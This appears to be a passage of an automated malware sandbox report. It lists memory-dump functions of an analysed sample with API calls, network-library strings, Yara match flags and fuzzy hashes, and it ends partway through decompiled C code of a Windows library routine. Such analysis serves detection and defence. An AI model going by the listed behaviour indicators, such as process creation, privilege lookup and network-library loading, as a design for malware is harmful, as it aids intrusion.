                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00136EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00136F88
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                                              • Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                              • Instruction ID: 1728ea18fde4774aa685948d7a4a9c709efd6ed55e836c964acdcf0c1c5ce2e1
                                                                                                                                                              • Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                              • Instruction Fuzzy Hash: D7317EB5602704BBC725DFA8D8A1FA7B7B8AB88700F10851DF65A9B241D770A545CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00136ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00136F88
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                                              • Opcode ID: 936a3f501cbd2cec915406afc23cfca05dcda0c95d0976fc097706c786fe2990
                                                                                                                                                              • Instruction ID: b4e0673e6d824a170c7196c066bc78c3a9c09f65b31156329c245411bc223ecb
                                                                                                                                                              • Opcode Fuzzy Hash: 936a3f501cbd2cec915406afc23cfca05dcda0c95d0976fc097706c786fe2990
                                                                                                                                                              • Instruction Fuzzy Hash: D82191B1601705BBC714DF68D8A1F6BBBB8FB48700F10806DF6196B241D770A555CBE5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00137003, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 148threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012CCD0,?,?), ref: 0013704C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                              • String ID: net.dll
                                                                                                                                                              • API String ID: 2422867632-2431746569
                                                                                                                                                              • Opcode ID: c73f92e25895f495b326a47d81eeaa64d94ae00d3d7e6fbc1259983d69c2d386
                                                                                                                                                              • Instruction ID: c40c324f0176d834efcbe65b98a0dbe472facb12d7cf10dc2b0a2814e28d8a02
                                                                                                                                                              • Opcode Fuzzy Hash: c73f92e25895f495b326a47d81eeaa64d94ae00d3d7e6fbc1259983d69c2d386
                                                                                                                                                              • Instruction Fuzzy Hash: 835121B2201704AFD325DB74CCA1FE7B7A8EF95350F084519F5199B282D770B809CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001384C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 001384FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID: .z`
                                                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                                                              • Opcode ID: cd1db7eef561868eea484d7bfcfc6c0d05ff4ac02921515c3758133ea27d0711
                                                                                                                                                              • Instruction ID: 81fc23b128bdad01736b7467451138efd276139d729d5f334bd6fdd04eea8d4d
                                                                                                                                                              • Opcode Fuzzy Hash: cd1db7eef561868eea484d7bfcfc6c0d05ff4ac02921515c3758133ea27d0711
                                                                                                                                                              • Instruction Fuzzy Hash: 3AF0A4B16002046FDB24EF98DC45ED7736DEF84390F118556F91C5B281DA31E9018BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001384D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123B93), ref: 001384FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID: .z`
                                                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                              • Instruction ID: 9e0b80b307642ab6f2379ecb1b53991331d3da707abcad33bc70c8615cbcda05
                                                                                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                              • Instruction Fuzzy Hash: C1E04FB12003046BDB14DF99DC45EA777ACEF88750F014554FD0857241CA30F910CAF0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00127260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001272BA
                                                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001272DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                              • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                              • Instruction ID: 7fff360589a04fb6444ff0de3a8503c8b0c096e4a97de8d55bc44c1af2b07b2a
                                                                                                                                                              • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                              • Instruction Fuzzy Hash: B301A231A80228B6E720A694AC03FFF776C9B50B51F550159FF04BA1C1E7946A0687F6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001385D6, Relevance: 1.6, APIs: 1, Instructions: 62processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00138594
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                              • Opcode ID: 6b30cd11a31c809e4ecd71e7169fe91787f613ba1a131f4303fc8460dffd367a
                                                                                                                                                              • Instruction ID: 24ffeb4228f88f0f8a9388e2d026251650ae23e2f598c36b3e8f737a7ecf9450
                                                                                                                                                              • Opcode Fuzzy Hash: 6b30cd11a31c809e4ecd71e7169fe91787f613ba1a131f4303fc8460dffd367a
                                                                                                                                                              • Instruction Fuzzy Hash: D211E2B6200208AFCB04DF99EC90DEB77ADEF8C754F018659FA4D97241CA30E8118BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00129B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00129B92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction ID: 69281a6a1310c21d850ca9770cd0b42c987be73f3e4e4a4717da0e8a6a5a311c
                                                                                                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                              • Instruction Fuzzy Hash: 29011EB5D0020DABDF10DAA4EC42F9DB7B89F54308F0041A5A90897241F771EB18CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0013853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00138594
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                              • Opcode ID: b54119da6e9bb181047b499ed903421fd6a409e6ff90c64af3df6441e880f77c
                                                                                                                                                              • Instruction ID: 1ebe1ffe5f50ff61899ea9d297f9c00df7ff0f5c7f1c87887e539fc76faba6a7
                                                                                                                                                              • Opcode Fuzzy Hash: b54119da6e9bb181047b499ed903421fd6a409e6ff90c64af3df6441e880f77c
                                                                                                                                                              • Instruction Fuzzy Hash: D301AFB6210208AFCB58DF89DC81EEB77ADAF8C754F158258FA1D97241D630E951CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00138540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00138594
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                              • Instruction ID: 9b6860660839af124188ce4e5ae23ffffc13849d6aa99d201d34590e14a17cb7
                                                                                                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                              • Instruction Fuzzy Hash: 77015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00137010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012CCD0,?,?), ref: 0013704C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                              • Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                                                                                              • Instruction ID: 1fbafcba3e7a28fa2f97ef651780c97cfacceb62ba6b36d28312484975d41508
                                                                                                                                                              • Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                                                                                              • Instruction Fuzzy Hash: 11E092733903043AE3306599AC03FA7B39CCB91B31F54002AFB4DEB2C1D695F90142A8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00138621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012CFA2,0012CFA2,?,00000000,?,?), ref: 00138660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: 0f55e3bad1f7f4d8bf6576f2cee979cc292c3ce6776f8d224f8bbf6c43f07882
                                                                                                                                                              • Instruction ID: 04d8fcdc5edb138d376c4e2d18b83dfba6ee7c748c14503b5a0065a1625457e8
                                                                                                                                                              • Opcode Fuzzy Hash: 0f55e3bad1f7f4d8bf6576f2cee979cc292c3ce6776f8d224f8bbf6c43f07882
                                                                                                                                                              • Instruction Fuzzy Hash: 3EF0E5792082806FD701DF659C80EE33B68DF45240F044594FCD94B202C934A806CBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00138490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00133516,?,00133C8F,00133C8F,?,00133516,?,?,?,?,?,00000000,00000000,?), ref: 001384BD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                              • Instruction ID: 82ba1218554293f5ec0570c58795070666a1d42022a31d3a9be7c91c5422dfdc
                                                                                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                              • Instruction Fuzzy Hash: 2DE012B1200208ABDB14EF99DC41EA777ACAF88650F118558FA085B282CA30F9108AB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00138630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012CFA2,0012CFA2,?,00000000,?,?), ref: 00138660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                              • Instruction ID: c586689edc73cc5806f1690e37295e3bd6b49bd43a65c5bcc61ee8eddd1b622b
                                                                                                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                              • Instruction Fuzzy Hash: 21E01AB12002086BDB10DF89DC85EE737ADAF88650F018554FA0857241CA30E8108BF5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0012D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00127C63,?), ref: 0012D43B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                              • Instruction ID: a85de56ba7772e720eb56623b2362d3256234b6559533b1af63089c561bf0aee
                                                                                                                                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                              • Instruction Fuzzy Hash: 07D05E617503043AE610BBA8AC03F2632885B54B10F494064F949962C3DA64E5004565
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 02168788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E02168788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02168460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0214E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0216718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02168460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0216718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02168460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02168460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02168460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0216718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0214E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
